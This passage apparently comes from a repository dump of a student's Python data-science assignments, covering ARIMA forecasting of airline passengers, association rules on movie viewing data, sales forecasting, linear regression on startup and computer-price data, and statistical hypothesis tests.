Admin\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_excel('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Forecasting\\\\Airlines_Data.xlsx')\r\ndata.head()\r\ndata.columns\r\n\r\nmonth_index = data.set_index(['Month'])\r\n\r\nplt.plot(month_index);plt.xlabel('Month');plt.ylabel('No. of Passengers')\r\n#data having upward trend with multiplicative seasonality, non stationary\r\nmonth_index.head()\r\nmonth_index.tail()\r\n\r\n#rolling statistics\r\nrolling_mean = month_index.rolling(window = 12).mean() #window = 12 for 12 months, for days=365\r\nrolling_std = month_index.rolling(window = 12).std()\r\nprint(rolling_mean)\r\nprint(rolling_std)\r\n\r\noriginal = plt.plot(month_index, color = 'blue', label = 'original')\r\nmean = plt.plot(rolling_mean, color = 'black',label = 'rolling mean')\r\nstd = plt.plot(rolling_std, color = 'red', label = 'rolling std')\r\nplt.legend(loc = 'best')\r\nplt.title('rolling mean and rolling std')\r\nplt.show()\r\n\r\n#perform dickey-fuller test to check stationarity of data\r\nfrom statsmodels.tsa.stattools import adfuller\r\ndftest = adfuller(month_index['Passengers'],autolag = 'AIC')\r\ndfoutput = pd.Series(dftest[0:4], index = ['Test statistic','P-value','Lags-used','Number of observations used'])\r\nfor key,value in dftest[4].items():\r\n dfoutput['critical value (%s)'%key] = value\r\n \r\nprint(dfoutput)\r\n#since p-value >0.05, accept null hypothesis that unit root is present in AR model and data is not stationary. 
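\r\n\r\n# A small helper (an illustrative sketch added for clarity; 'is_stationary',\r\n# 'series' and 'alpha' are hypothetical names, not part of the original script)\r\n# that captures the decision rule used throughout this analysis: reject the\r\n# unit-root null when the ADF p-value is below 0.05.\r\ndef is_stationary(series, alpha=0.05):\r\n    # adfuller() returns (test statistic, p-value, ...); index 1 is the p-value\r\n    return adfuller(series, autolag='AIC')[1] < alpha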
\r\n\r\n#estimating trend\r\nmonth_index_log = np.log(month_index) \r\nplt.plot(month_index_log)\r\n#upward trend remains same, but value of y has been changed\r\n\r\n#rolling statistics for transformed data\r\nmoving_average = month_index_log.rolling(window = 12).mean()\r\nmoving_std = month_index_log.rolling(window = 12).std()\r\nprint(moving_average)\r\nprint(moving_std)\r\n\r\norig = plt.plot(month_index_log,color = 'blue',label = 'log transformed')\r\nmean_log = plt.plot(moving_average,color = 'black',label = 'rolling mean_log')\r\nplt.legend(loc = 'best')\r\nplt.title('moving average')\r\nplt.show()\r\n#upward trend still persists\r\n\r\n#getting difference between log values and moving average\r\nlogMinusMA = month_index_log - moving_average\r\nlogMinusMA\r\nlogMinusMA.dropna(inplace = True)\r\nlogMinusMA.head()\r\n\r\n#stationarity check function\r\nfrom statsmodels.tsa.stattools import adfuller\r\ndef test_stat(ts):\r\n    \r\n    #determining rolling statistics\r\n    mov_avg = ts.rolling(window = 12).mean()\r\n    mov_std = ts.rolling(window = 12).std()\r\n    \r\n    #plotting rolling statistics \r\n    org = plt.plot(ts,color = 'blue',label = 'original')\r\n    MA = plt.plot(mov_avg, color = 'red',label = 'Moving average')\r\n    std = plt.plot(mov_std, color = 'black',label ='Moving std')\r\n    plt.legend(loc = 'best')\r\n    plt.title('rolling statistics')\r\n    plt.show()\r\n    \r\n    #performing Dickey-Fuller test for stationarity check\r\n    df_test = adfuller(ts['Passengers'],autolag = 'AIC')\r\n    df_output = pd.Series(df_test[0:4],index = ['Test statistic', 'p-value','#Lags used','No. of Observations used'])\r\n    for key, value in df_test[4].items(): #.items is very important\r\n        df_output['critical value (%s)'%key] = value\r\n    print(df_output)\r\n    \r\n\r\ntest_stat(logMinusMA)\r\n#p-value<0.05, and test statistic is approx.= critical value. Therefore, the time series is now stationary\r\n\r\nplt.plot(logMinusMA)\r\n\r\n#differencing\r\nlogMinusMAshifted = month_index_log - month_index_log.shift()\r\nplt.plot(logMinusMAshifted)\r\n\r\nlogMinusMAshifted.dropna(inplace = True)\r\ntest_stat(logMinusMAshifted)\r\n#since p-value is nearly = 0.05, data is almost stationary. 
\r\n\r\nfrom statsmodels.tsa.seasonal import seasonal_decompose\r\nresult = seasonal_decompose(month_index_log, model = 'additive', period = 12)\r\ntrend = result.trend \r\nseasonal = result.seasonal\r\nresidual = result.resid\r\n\r\nplt.subplot(411)\r\nplt.plot(month_index_log, label = 'original')\r\nplt.legend(loc = 'best')\r\nplt.subplot(412)\r\nplt.plot(trend, label = 'trend')\r\nplt.legend(loc = 'best')\r\nplt.subplot(413)\r\nplt.plot(seasonal, label = 'seasonality')\r\nplt.legend(loc = 'best')\r\nplt.subplot(414)\r\nplt.plot(residual, label = 'residuals')\r\nplt.legend(loc = 'best')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n#checking residuals for stationarity\r\ndec_log = residual\r\ndec_log.dropna(inplace = True)\r\n\r\n    \r\nmov_avg1 = dec_log.rolling(window = 12).mean()\r\nmov_std1 = dec_log.rolling(window = 12).std()\r\n    \r\n#plotting rolling statistics \r\nxorg1 = plt.plot(dec_log,color = 'blue',label = 'original')\r\nMA1 = plt.plot(mov_avg1, color = 'red',label = 'Moving average')\r\nstd1 = plt.plot(mov_std1, color = 'black',label ='Moving std')\r\nplt.legend(loc = 'best')\r\nplt.title('noise component')\r\nplt.show()\r\n    \r\ndec_log = dec_log.to_frame()\r\n#performing Dickey-Fuller test for stationarity check\r\ndf_test1 = adfuller(dec_log['resid'],autolag = 'AIC')\r\ndf_output1 = pd.Series(df_test1[0:4],index = ['Test statistic', 'p-value','#Lags used','No. of Observations used'])\r\nfor key, value in df_test1[4].items(): #.items is very important\r\n    df_output1['critical value (%s)'%key] = value\r\nprint(df_output1)\r\n# Noise component not stationary\r\n\r\n#d = 1\r\n#plotting acf plot for q and for value of p plotting pacf plot\r\nfrom statsmodels.tsa.stattools import acf, pacf\r\n\r\nlag_acf = acf(logMinusMAshifted,nlags = 20,fft = False)\r\nlag_pacf = pacf(logMinusMAshifted,nlags = 20, method = 'ols')\r\n\r\n#plot acf\r\nplt.plot(lag_acf)\r\nplt.axhline(y = 0,linestyle='--')\r\nplt.axhline(y = -1.96/np.sqrt(len(logMinusMAshifted)),linestyle = '--')\r\nplt.axhline(y = 1.96/np.sqrt(len(logMinusMAshifted)),linestyle = '--')\r\nplt.title('Autocorrelation plot')\r\n#graph first approaches to zero at approx. 2 so, q=2\r\n\r\n#plot pacf plot\r\nplt.plot(lag_pacf)\r\nplt.axhline(y = 0,linestyle='--')\r\nplt.axhline(y = -1.96/np.sqrt(len(logMinusMAshifted)),linestyle = '--')\r\nplt.axhline(y = 1.96/np.sqrt(len(logMinusMAshifted)),linestyle = '--')\r\nplt.title('Partial Autocorrelation plot')\r\n#graph first approaches to zero at approx. 
2 so, p=2\r\n\r\n#AR model(taking q = 0)\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\nmodel_ar = ARIMA(month_index_log, order = (2,1,0))\r\nresult_ar = model_ar.fit(disp = -1 )\r\n\r\nplt.plot(logMinusMAshifted)\r\nplt.plot(result_ar.fittedvalues, color = 'red')\r\nplt.title('RSS: %.4f'% sum((result_ar.fittedvalues - logMinusMAshifted['Passengers'])**2))\r\n#RSS-0.9508\r\n \r\n#MA model (taking p = 0)\r\nmodel_ma = ARIMA(month_index_log, order = (0,1,2))\r\nresult_ma = model_ma.fit(disp = -1 )\r\n\r\nplt.plot(logMinusMAshifted)\r\nplt.plot(result_ma.fittedvalues, color = 'red')\r\nplt.title('RSS: %.4f'% sum((result_ma.fittedvalues - logMinusMAshifted['Passengers'])**2))\r\n#RSS-0.8278\r\n \r\n#combined ARIMA model for forecasting\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\nmodel = ARIMA(month_index_log, order = (2,1,2))\r\nresult = model.fit(disp = -1 )\r\n\r\nplt.plot(logMinusMAshifted)\r\nplt.plot(result.fittedvalues, color = 'red')\r\nplt.title('RSS: %.4f'% sum((result.fittedvalues - logMinusMAshifted['Passengers'])**2))\r\n#RSS-0.6931\r\n \r\n\r\n#predictions\r\npredictions = pd.Series(result.fittedvalues,copy = True)\r\nprint(predictions.head())\r\n\r\npredictions_cumsum = predictions.cumsum()\r\nprint(predictions_cumsum.head())\r\n\r\npred_log = pd.Series(month_index_log.iloc[:,0], index = month_index_log.index)\r\npred_log = pred_log.add(predictions_cumsum, fill_value = 0)\r\nprint(pred_log.head())\r\n\r\npred_arima = np.exp(pred_log)\r\n\r\nplt.plot(month_index, color = 'blue')\r\nplt.plot(pred_arima, color = 'red')\r\nplt.title('RMSE: %.4f'% np.sqrt(sum((pred_arima-month_index.iloc[:,0])**2)/len(month_index)))\r\n\r\nresult.plot_predict(1,200)\r\nx = result.forecast(steps = 120)\r\n\r\n" }, { "alpha_fraction": 0.6981317400932312, "alphanum_fraction": 0.7207472920417786, "avg_line_length": 33.71929931640625, "blob_id": "ac80a3c09324e3dde001afe2515b438e954b181c", "content_id": "369e0aaae6d961fdaa0af6214821d0b95872fec0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2034, "license_type": "no_license", "max_line_length": 141, "num_lines": 57, "path": "/Association Rules/my_movies.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 26 20:41:47 2020\r\n\r\n@author: Dhotre\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mlxtend.frequent_patterns import apriori,association_rules\r\n\r\n#importig dataset\r\ndata=pd.read_csv('D:\\\\ML Docs\\\\Excelr\\\\Assignments\\\\Association rules\\\\my_movies.csv')\r\ndata.describe()\r\n\r\n#removing unwanted columns\r\ndata_apr=data.iloc[:,5:]\r\ndata_apr\r\n\r\n#getting frequent itemsets\r\nfrequent_itemsets1 = apriori(data_apr,min_support = 0.05,max_len = 3,use_colnames = True)\r\nfrequent_itemsets=frequent_itemsets1.sort_values('support', ascending = False, inplace = False)\r\n\r\n#barplot of top 10 items with highest support\r\nplt.figure(figsize = (25,10))\r\nplt.bar(x= list(range(0,11)), height = frequent_itemsets.support.iloc[0:11,]);plt.xticks(list(range(0,11)),frequent_itemsets.itemsets[0:11])\r\nplt.xlabel('itemsets');plt.ylabel('support values')\r\n\r\n#getting association rules\r\nrules1 = association_rules(frequent_itemsets, metric = 'lift', min_threshold=1)\r\nrules= rules1.sort_values('lift', ascending = False, inplace = False)\r\n\r\n#removing redundancy\r\ndef slist(i):\r\n return 
(sorted(list(i)))\r\n\r\nconcat1 = rules.antecedents.apply(slist)+ rules.consequents.apply(slist) \r\nconcat = concat1.apply(sorted) #ascending order\r\n\r\nrule_sets = list(concat) #converting series to list\r\n\r\nuniq_rule_sets = [list(m) for m in set(tuple(i) for i in rule_sets)]\r\n\r\nindex_rules = []\r\nfor i in uniq_rule_sets:\r\n    index_rules.append(rule_sets.index(i))\r\n    \r\nrules_no_red = rules.iloc[index_rules,:]\r\nfinal_rules = rules_no_red.sort_values('lift',ascending = False , inplace = False)\r\n\r\n#customers who watched 'sixth sense' and 'LOTR1' have also watched 'Green Mile'\r\n#person watching 'Green Mile' most probably watched 'LOTR1' and 'Harry Potter'\r\n#persons who watched 'Harry Potter 1' have watched 'LOTR1'\r\n# and many more such rules can be made as per those mentioned in rules_no_red; giving offers or discounts to the audience as per\r\n#the formed rules will yield better profits" }, { "alpha_fraction": 0.6438301205635071, "alphanum_fraction": 0.6654647588729858, "avg_line_length": 30, "blob_id": "d0a6c30e35ea01a8716e6a882afe6df13df00239", "content_id": "0a9a976f5f59596f126ed3e9fdc059df321a037f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2496, "license_type": "no_license", "max_line_length": 102, "num_lines": 78, "path": "/Forecasting/plastics.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 4 01:19:41 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pylab as plt\r\nimport statsmodels.formula.api as smf\r\n\r\n#Importing data set\r\ndata=pd.read_csv(\"E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Forecasting\\\\PlasticSales.csv\")\r\n\r\nmonth=['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\r\np=data['Month'][0]\r\ndata['month']=0\r\nfor i in range(60):\r\n    p=data['Month'][i]\r\n    data['month'][i]=p[0:3]\r\n\r\n#EDA\r\ndata['Sales'].isnull().sum()\r\ndata['Sales'].mean() \r\ndata['Sales'].median()\r\ndata['Sales'].mode()\r\ndata['Sales'].var()\r\ndata['Sales'].std()\r\ndata['Sales'].skew() #slight right skewed\r\ndata['Sales'].kurt() #slight flat curve\r\ndata.describe()\r\n\r\n#getting dummies\r\nmonth_dummies = pd.DataFrame(pd.get_dummies(data['month']))\r\ndata = pd.concat([data,month_dummies],axis = 1)\r\n\r\n#creating new column for timeseries\r\n#creating a new variable 't'\r\ndata['t']=np.arange(1,61)\r\n#Creating a new variable 't_squared'\r\ndata[\"t_squared\"] = data[\"t\"]*data[\"t\"]\r\n#Creating a new variable 'log_Rider'\r\ndata[\"log_Rider\"] = np.log(data[\"Sales\"])\r\n\r\n#Dropping Months column\r\ndata=data.drop('Month',axis=1)\r\n\r\n#Splitting data into train and test data\r\nTrain = data.head(48)\r\nTest = data.tail(12)\r\n\r\n## Additive seasonality ##\r\nadd_sea = smf.ols('Sales~month',data=Train).fit()\r\npred_add_sea = pd.Series(add_sea.predict(Test[['month']]))\r\nrmse_add_sea = np.sqrt(np.mean((np.array(Test['Sales'])-np.array(pred_add_sea))**2))\r\nrmse_add_sea\r\n#235.60\r\n## Additive Seasonality Quadratic ##\r\nadd_sea_Quad = smf.ols('Sales~t+t_squared+month',data=Train).fit()\r\npred_add_sea_quad = pd.Series(add_sea_Quad.predict(Test[['month','t','t_squared']]))\r\nrmse_add_sea_quad = np.sqrt(np.mean((np.array(Test['Sales'])-np.array(pred_add_sea_quad))**2))\r\nrmse_add_sea_quad #218.19\r\n\r\n## Multiplicative Seasonality ##\r\nMul_sea = smf.ols('log_Rider~month',data = 
Train).fit()\r\npred_Mult_sea = pd.Series(Mul_sea.predict(Test))\r\nrmse_Mult_sea = np.sqrt(np.mean((np.array(Test['Sales'])-np.array(np.exp(pred_Mult_sea)))**2))\r\nrmse_Mult_sea#239.654\r\n\r\n## Multiplicative Additive Seasonality ##\r\nMul_Add_sea = smf.ols('log_Rider~t+month',data = Train).fit()\r\npred_Mult_add_sea = pd.Series(Mul_Add_sea.predict(Test))\r\nrmse_Mult_add_sea = np.sqrt(np.mean((np.array(Test['Sales'])-np.array(np.exp(pred_Mult_add_sea)))**2))\r\nrmse_Mult_add_sea #160.6833\r\n\r\n#'Multiplicative Additive Seasonality' model is working best, with the least rmse value (160.68)\r\n" }, { "alpha_fraction": 0.6878701448440552, "alphanum_fraction": 0.7170432209968567, "avg_line_length": 28.905660629272461, "blob_id": "cbf225d072200116886da09b1a41460e191947ce", "content_id": "99a3408e335ff6ff14cbfe8c4e6c4a897555ab3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4559, "license_type": "no_license", "max_line_length": 117, "num_lines": 148, "path": "/Multi linear Regession/50startups.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jan 23 16:10:33 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\n#importing required libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n#importing Dataset\r\ndata= pd.read_csv ('E:\\\\Tej\\Assignments\\\\Asgnmnt\\\\Multi linear Regession\\\\50_Startups.csv')\r\n\r\n\r\n#EDA\r\ndata.columns\r\ndata.info()\r\n\r\n#converting object dtype to category for encoding\r\ndata['State']=data['State'].astype('category')\r\n\r\n#replacing 0 with nan\r\nfrom numpy import nan\r\ndata=data.replace(0,nan)\r\n#replacing nan values with column means\r\ndata.fillna(data.mean(),inplace=True)\r\n\r\nimport seaborn as sns\r\nsns.catplot(x='State',y='Profit',kind= 'box' ,data = data) #New York has outliers\r\nsns.barplot( x='State',y='Profit',data = data)\r\n\r\nsns.distplot(data['RndSpend'],kde=True)\r\nsns.distplot(data['Marketing _Spend'],kde=True)\r\nsns.distplot(data['Administration'],kde=True) #left skewed(negatively)\r\n\r\ndata.skew()\r\ndata.kurt()\r\n\r\nsns.heatmap(data.corr(),annot=True)\r\n\r\n#splitting into x and y\r\nx=data.iloc[:,0:4].values\r\ny=data.iloc[:,-1].values\r\n\r\n#Encoding categorical data\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nct= ColumnTransformer(transformers=[('encoder',OneHotEncoder(),[3])],remainder='passthrough')\r\n#[('kind of transformation,class of trans(),[column index])] passthrough=don't remove data which does not need transformation\r\nx=np.array(ct.fit_transform(x)) #transforming features of matrix X, returning new columns=no. 
of categories\r\n #our future ML model will expect the variable to be np array\r\nprint(x)\r\n\r\n#splitting dataset into test train data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test= train_test_split(x,y,test_size=0.3,random_state=0)\r\n#if random_state is mentioned same values in train and test datasets always\r\n\r\n#building and training the model\r\nfrom sklearn.linear_model import LinearRegression\r\nmodel= LinearRegression() #build the model\r\nmodel.fit(x_train,y_train) #train the model\r\nprint(model.score(x_test,y_test)) #0.878\r\n\r\n#predicting the results\r\ny_pred=model.predict(x_test)\r\nnp.set_printoptions(precision=2) #upto 2 decimals\r\nprint(y_pred)\r\nprint(np.concatenate((y_pred.reshape(len(y_pred),1),y_test.reshape(len(y_test),1)),1))\r\n\r\n#prediction for the single value\r\nprint(model.predict([[1,0,0,160000,130000,300000]]))\r\n\r\nprint(model.coef_) \r\nprint(model.intercept_)\r\n\r\n#saving prediction in dataset\r\ndata['pred']=(model.predict(x))\r\n\r\n#RMSE for Predicted data\r\ny_resid=data.pred -data.Profit\r\ny_rmse=np.sqrt(np.mean(y_resid*y_resid))\r\ny_rmse #17950.72\r\n\r\n#predicted vs actual\r\nplt.scatter(data['Profit'],data['pred'])\r\n\r\ndata['pred'].corr(data['Profit']) #0.8938\r\n\r\nfrom sklearn.metrics import r2_score\r\ntest_r2_score=r2_score(y_pred,y_test) \r\nprint(test_r2_score) #0.8612\r\n\r\n\r\n####backward elimination####\r\nx=np.append(arr=np.ones((50,1)).astype(int),values=x,axis=1)\r\nimport statsmodels.regression.linear_model as lm\r\n\r\n#creating feature vector which only contain a set of independent variables\r\nx_vtr=x[:,0:]\r\nx_vtr=np.array(x_vtr,dtype=float)\r\nmodel_be=lm.OLS(endog = y, exog = x_vtr).fit()\r\nmodel_be.summary() #x5 is insignificant pvalue=0.995\r\n\r\nx_vtr=x[:,[0,1,2,3,4,6]]\r\nx_vtr=np.array(x_vtr,dtype=float)\r\nmodel_be=lm.OLS(endog=y,exog=x_vtr).fit()\r\nmodel_be.summary() #x1 is insignificant, pvalue=0.092\r\n\r\nx_vtr=x[:,[0,2,3,4,6]]\r\nx_vtr=np.array(x_vtr,dtype=float)\r\nmodel_be=lm.OLS(endog=y,exog=x_vtr).fit()\r\nmodel_be.summary() #x2 is insignificant pvalue=0.374\r\n\r\nx_vtr=x[:,[0,2,4,6]]\r\nx_vtr=np.array(x_vtr,dtype=float)\r\nmodel_be=lm.OLS(endog=y,exog=x_vtr).fit()\r\nmodel_be.summary(()) #x1 is insignificant\r\n\r\nx_vtr=x[:,[0,4,6]]\r\nx_vtr=np.array(x_vtr,dtype=float)\r\nmodel_be=lm.OLS(endog=y,exog=x_vtr).fit()\r\nmodel_be.summary()\r\n\r\n#therefore only Rndspend and Marketing-spend are significant, therefore we can now build model\r\n#efficiently on these variables\r\ndataset=data[['Profit','RndSpend','Marketing _Spend']]\r\ndataset\r\n\r\nx_be=dataset.iloc[:,1:].values\r\ny_be=dataset.iloc[:,0].values\r\n\r\n#splitting dataset into test and train\r\nfrom sklearn.model_selection import train_test_split\r\nxbe_train,xbe_test,ybe_train,ybe_test=train_test_split(x_be,y_be,test_size=0.2,random_state=0)\r\n\r\n\r\n#training and building the model\r\nfrom sklearn.linear_model import LinearRegression\r\nmodel2=LinearRegression()\r\nmodel2.fit(np.array(xbe_train),ybe_train)\r\nmodel2.score(xbe_train,ybe_train) #0.77\r\nmodel2.score(xbe_test,ybe_test) #0.90\r\nmodel2.score(x_be,y_be) #0.79 \r\n" }, { "alpha_fraction": 0.6807786822319031, "alphanum_fraction": 0.7146097421646118, "avg_line_length": 33.911563873291016, "blob_id": "6f84e97fd17582f76a1b66ce15ce9e432169ec01", "content_id": "776ba8e2d75de58667988154d567cb9dab925fe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5291, 
"license_type": "no_license", "max_line_length": 106, "num_lines": 147, "path": "/Hypothesis/hypo testing assignment.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 4 17:04:59 2020\r\n\r\n@author: Tejaswini\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scipy import stats\r\nimport statsmodels as sm\r\n\r\n\r\ndata=pd.read_csv('E:\\Tej\\Assignments\\Asgnmnt\\Hypothesis\\Cutlets.csv')\r\ndata\r\n#Data are continuous and comparison of two population samples is to be done\r\n####checking the data for normality####\r\n#H0=data are normal and Ha=Data are not normal\r\n\r\nunit_a=stats.shapiro(data['Unit A'])\r\nunit_a_pvalue=unit_a[1]\r\nprint('p value is '+str(unit_a_pvalue))\r\n\r\n#since p-value is > 0.05--> fail to reject null hypothesis \r\n#Data are normal\r\n\r\nunit_b=stats.shapiro(data['Unit B'])\r\nunit_b_pvalue= unit_b[1]\r\nprint('p value is '+str(unit_b_pvalue))\r\n#since p-value is > 0.05--> fail to reject null hypothesis \r\n#Data are normal\r\n\r\n####checking for variance####\r\n#H0= Data have equal variance & Ha=Data have unequal variance\r\nstats.levene(data['Unit A'],data['Unit B'])\r\n#pvalue is >0.05, Fail to reject H0--> Data are having equal variance.\r\nhelp(stats.levene)\r\n#2 sample t_test\r\n#H0= diameter of cutlet in Unit A= diameter of cutlet in Unit B\r\n#Ha= diameter of cutlet in Unit A is not equal to the diameter of cutlet in Unit B\r\nresult=stats.ttest_ind(data['Unit A'],data['Unit B'])\r\nprint('p value is '+str(result[1]))\r\n# since p-value is >0.05,Fail to reject H0\r\n#Thus there is no any significant difference in the diameter of the cutlet between two units. \r\n\r\n\r\n\r\n\r\n\r\n####BuyerRatio#####\r\nsales=pd.read_csv('D:\\ML Docs\\Excelr\\Assignments\\Hypothesis testing\\BuyerRatio.csv',encoding='ISO-8859-1')\r\nsales\r\nsales.columns\r\n\r\nsales1=sales.drop('Observed Values',axis=1)\r\nsales1\r\n\r\nsales1.values\r\nstats.chi2_contingency(sales1)\r\n#x=male,female y=sales\r\n#since both the x and y are discrete in 2+categories, we will go for chi-squared test\r\n# Let H0= all proportiona are equal and Ha=Not all proportions are same.\r\nchi2=stats.chi2_contingency(sales1)\r\nchi2\r\nchi2_pvalue=chi2[1]\r\nprint('p-value is '+str(chi2_pvalue))\r\nhelp(stats.chi2_contingency)\r\n#since, P-value=0.66>0.05-->P high Null fly. therefore, all proportions are equal.\r\n\r\n\r\n\r\n\r\n####Average Turn Around Time####\r\n#H0 = there is difference in the average Turn Around Time (TAT) of reports.\r\n#Ha = there is no difference in the average Turn Around Time (TAT) of reports. \r\ntat=pd.read_csv('F:\\\\Excelr docs\\\\Assignments\\\\Hypothesis testing\\\\LabTAT.csv',encoding='ISO-8859-1')\r\ntat\r\n# here, x=no. 
of samples, y= Turn Around Time\r\n# more than two samples are involved, therefore we will go for normality test.\r\n#H0=Data are normal, Ha=Data are not Normal\r\nlab1= stats.shapiro(tat['Laboratory 1'])\r\nlab1_pvalue=lab1[1]\r\nprint('p-value is '+str(lab1_pvalue))\r\n# pvalue=0.55,data are normal\r\n\r\nlab2=stats.shapiro(tat['Laboratory 2'])\r\nlab2_pvalue=lab2[1]\r\nprint('p-value is '+str(lab2_pvalue))\r\n#pvalue=0.86, Data are normal\r\n\r\nlab3=stats.shapiro(tat['Laboratory 3'])\r\nlab3_pvalue=lab3[1]\r\nprint('p-value is '+str(lab3_pvalue))\r\n#p-value=0.42, data are normal\r\n\r\nlab4=stats.shapiro(tat['Laboratory 4'])\r\nlab4_pvalue=lab4[1]\r\nprint('p-value is '+str(lab4_pvalue))\r\n#p-value=0.66, data are normal\r\n\r\n#since the data are normal, we will proceed for the variance test\r\n# H0= data have equal variance, Ha=Data do not have equal Variance\r\nvar_lab1=stats.levene(tat['Laboratory 1'],tat['Laboratory 2'])\r\nprint('p value is '+str(var_lab1[1])) # pvalue=0.06 data have equal variance\r\n# \r\nvar_lab2=stats.levene(tat['Laboratory 1'],tat['Laboratory 3'])\r\nprint('p-value is '+str(var_lab2[1])) #pvalue=0.0064 data do not have equal variance\r\n\r\nvar_lab3=stats.levene(tat['Laboratory 1'],tat['Laboratory 4'])\r\nprint('p value is '+str(var_lab3[1])) #pvalue 0.221 data have equal variance\r\n\r\nvar_lab4=stats.levene(tat['Laboratory 2'],tat['Laboratory 3'])\r\nprint('p value is '+str(var_lab4[1])) # pvalue=0.33 data have equal variance\r\n\r\n#one way ANOVA test\r\nimport scipy.stats as stats\r\noutcome = stats.f_oneway(tat['Laboratory 1'],tat['Laboratory 2'],tat['Laboratory 3'],tat['Laboratory 4'])\r\np_value = outcome[1]\r\nprint(p_value)\r\n# pvalue is less than 0.05, therefore, P low null go, accepting the alternate hypothesis that\r\n# there is a difference in the average Turn Around Time (TAT) of reports.\r\n\r\n####Faltoons####\r\ndata= pd.read_csv('D:\\ML Docs\\Excelr\\Assignments\\Hypothesis testing\\Faltoons.csv',encoding='ISO-8859-1')\r\ndata\r\ndata.describe()\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber= LabelEncoder()\r\ndata['Weekdays']=number.fit_transform(data['Weekdays'])\r\ndata['Weekend']=number.fit_transform(data['Weekend'])\r\ndata\r\n#converted Female=0 and Male=1\r\ndata['Weekdays'].value_counts()\r\ndata['Weekend'].value_counts()\r\n\r\ncount= np.array([287,233]) # how many females went for shopping on weekdays and weekend\r\nnos= np.array([400,400]) #how many total number of females went for shopping\r\n\r\n#Ho= the male vs female ratio of walk-ins is the same on weekdays and weekends\r\n#Ha= the male vs female ratio of walk-ins differs based on the day of the week\r\nfrom statsmodels.stats.proportion import proportions_ztest\r\nstats,pval=proportions_ztest(count,nos)\r\nprint('{0:0.6f}'.format(pval))\r\n#P-value-->0.00006<0.05. 
P low null go\r\n#therefore accepting the alternative hypothesis\r\n#so, the male vs female ratio of walk-ins differs based on the day of the week\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6736963391304016, "alphanum_fraction": 0.7009202241897583, "avg_line_length": 25.886598587036133, "blob_id": "ef0e28ce5481616ab01fc9aa6fdf3ac96137c94d", "content_id": "52ab25388ed8dc2fc8d6f892661fc9518429c869", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2608, "license_type": "no_license", "max_line_length": 108, "num_lines": 97, "path": "/Multi linear Regession/Computer_Data.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Dec 21 11:43:38 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n#importing dataset\r\ndf= pd.read_csv('E:\\Tej\\Assignments\\Asgnmnt\\Multi linear Regession\\Computer_Data.csv',encoding='ISO-8859-1')\r\n\r\n#EDA\r\ndf.head()\r\ndf.columns\r\ndf.info()\r\n\r\ndf1=df[['price', 'speed', 'hd']]\r\nsns.barplot(x='ram',y='price',data=df)\r\nsns.barplot(x='cd',y='price',data=df)\r\nsns.barplot(x='ads',y='price',data=df)\r\nplt.scatter('hd','speed',data=df)\r\n\r\ndf.skew()\r\ndf.kurt()\r\n\r\nsns.heatmap(df1.corr(),annot=True)\r\nsns.distplot(df['price'],kde=True) #positively skewed\r\nsns.distplot(df['hd'],kde=True) #not normal \r\n\r\nsns.catplot(x='screen',y='price',data=df,kind='box')\r\nsns.catplot(x='screen',y='price',data=df,kind='box')\r\n\r\nplt.plot(df.price,df.ram,'ro')\r\ndf.ram.value_counts().plot(kind='pie')\r\n\r\ndf.price.groupby(df.screen).plot(kind='hist')\r\n\r\n#Encoding categorical data\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber= LabelEncoder()\r\ndf['cd']= number.fit_transform(df['cd'])\r\ndf['multi']= number.fit_transform(df['multi'])\r\ndf['premium']= number.fit_transform(df['premium'])\r\ndf.dtypes\r\n\r\n#separating x and y variables\r\nx= df.iloc[:,1:].values\r\ny=df.iloc[:,0].values\r\n\r\nsns.pairplot(df)\r\n\r\n\r\n#splitting data into train and test data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.3,random_state=0)\r\n\r\n#creating linear model\r\nfrom sklearn.linear_model import LinearRegression\r\nmodel=LinearRegression() #model 